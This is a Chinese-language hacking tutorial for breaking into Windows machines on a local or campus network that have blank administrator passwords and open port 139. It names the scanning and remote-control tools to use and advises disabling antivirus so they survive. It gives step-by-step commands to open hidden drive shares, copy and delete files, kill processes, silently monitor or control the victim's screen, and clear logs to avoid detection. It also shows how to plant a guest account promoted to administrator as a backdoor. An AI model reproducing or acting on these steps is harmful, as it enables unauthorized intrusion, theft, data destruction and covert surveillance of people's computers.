1.***的范围只包括局域网，如果在学校上，可以***整个校园网;

　　2.能***的只是存在弱口令(用户名为administrator等,密码为空)，并且开了139端口，但没开防火墙的机子。

　　***工具：

　　一般要用到三个：NTscan变态扫描器，Recton--D贺免杀专用版，DameWare迷你中文版 4.5. (前两个工具杀毒软件都会报毒，建议将杀毒软件实时防毒暂时关掉，并将这两个软件的压缩包加密，防止被杀。)

　　***步骤：

　　1.使用"NTscan变态扫描器"，在IP处填上要扫描的IP范围，选择"WMI扫描"方式，按"开始"后就等扫描结果了。

　　2.使用"Recton--D贺免杀专用版"

　　选择"CMD命令"项，在"CMD:"中输入"net share C$ =C:"，即可开启远程主机的C盘共享，以此将"C"换成D,E,F等，即可开启D盘，E盘，F盘等的共享，这种共享方式隐蔽性很高，而且是完全共享，在对方主机上不会出现一只手托住盘的共享标志，然后在地址栏中输入"\\对方IP\C$ "，即可进入对方C盘。

　　选择"Telnet"项，在"远程主机"中输入刚才扫描到的一个IP，远程启动Telnet服务，成功后在"CMD选项"中，执行命令："net share ipc$ ",接着执行："net share admin$ ",最后执行"net use \\***.***.***.***\IPC$ " /user：administrator"在*处填入你***的主机IP。

　　3.使用"DameWare迷你中文版 4.5"，安装后点"DameWare Mini Remote Control"，在"帮助"项中选择激活产品，输入注册信息，成功注册后，进入"远程连接"窗口，在"主机"处填入IP地址，点"设置"，在"服务安装选项"中点"编辑"后,在"通知对话框"中去掉"连接时通知",在"附加设置"中全都不选，在"用户选项"中去掉"启用用户选项菜单"。设置完成好后，就可点"连接"，在弹出的对话框中点"确定"后，成功后你就可以像操作自己机子一样控制别人电脑了，当然你也可以只选择监视对方屏幕。 注意：如果不注册的话，在对方主机上会弹出一个对话框，暴露你的身份。

　　***步骤补充：

　　1.在以上第2步中，远程启动Telnet服务可以通过"我的电脑-管理-连接到另一台计算机-输入IP-服务和应用程序-服务-将telnet改为手动-启动"完成。

　　2.Recton-D贺免杀专用版还有其他功能，在"进程"项中，可以查看远程主机的进程，并可任意结束其中进程;在"共享"项中，可以创建共享，我常用的是创建C$ ,D$ ,E$ ,F$ ,共享路径分别对应C：\,D：\等，共享好后在地址栏中输入\\IP\C$ ,进入对方C盘，你就可以随意复制删除里面的东西了，而且这种共享对方机子盘符上不会显示共享图标，也就不会被发现，弄完后最好还是把共享给关掉。最后选"日志"，清除所有日志，不留痕迹。这个软件会被杀毒软件当作病毒杀掉，用它时须将实时防毒关掉。

　　3.上面的共享可通过CMD(程序-附件-命令提示符)完成，首先"telnet IP",telnet上去,键入y后输入的用户名"administrator",密码为空, 进入后，开共享用net share命令，共享C$ (即C盘)："net share C$ =C：",共享system文件夹："net share c=c：\winnt\system32",共享IPC$ 用："net share IPC$ "等,最后是关闭共享，关闭C盘共享："net share C$ Content$ nbsp;/del"。

　　4.为方便下次***，可以设置后门， 查看用户："net user",激活guest用户

　　"net user guest /active：yes",更改guest的密码为poco："net user guest poco",把guest的权限提升为管理员权限："net localgroup administrators guest /add"。

　　5.telnet命令(DOS命令)很多，可去网上查找它的命令，常用的有：查看D盘文件：""dir d：",查看C盘program file文件夹："dir c：\PROGRA~1\;",60秒倒记时关机："shutdown -s -t 60"

　　补充说明：

　　1.net use错误原因解决：

　　(1)."发生系统错误 1326。 登录失败： 未知的用户名或错误密码。"

　　在远程机的"控制面板-文件夹选项-查看-简单的文件共享",去掉选取,然后再尝试连接。简单文件共享会把网络连接权限都归为 guest连接，是无法访问C$ 等管理共享的.

　　(2)"发生系统错误 1327。 登陆失败：用户帐户限制。可能的原因包括不允许空密码，登陆时间限制，或强制的策略限。"在远程机的"控制面板-管理工具-本地安全策略-安全选项-用户权限"指派里，禁用"空密码用户只能进行控制台登陆".

　　(3)"//IP/c$ "时提示找不到网络途径。在"网络和拨号连接"中"本地连接"中选取"Internet协议(TCP/IP)"属性，进入"高级TCP/IP设置"选"WINS设置"里面有一项"启用TCP/IP的NETBIOS".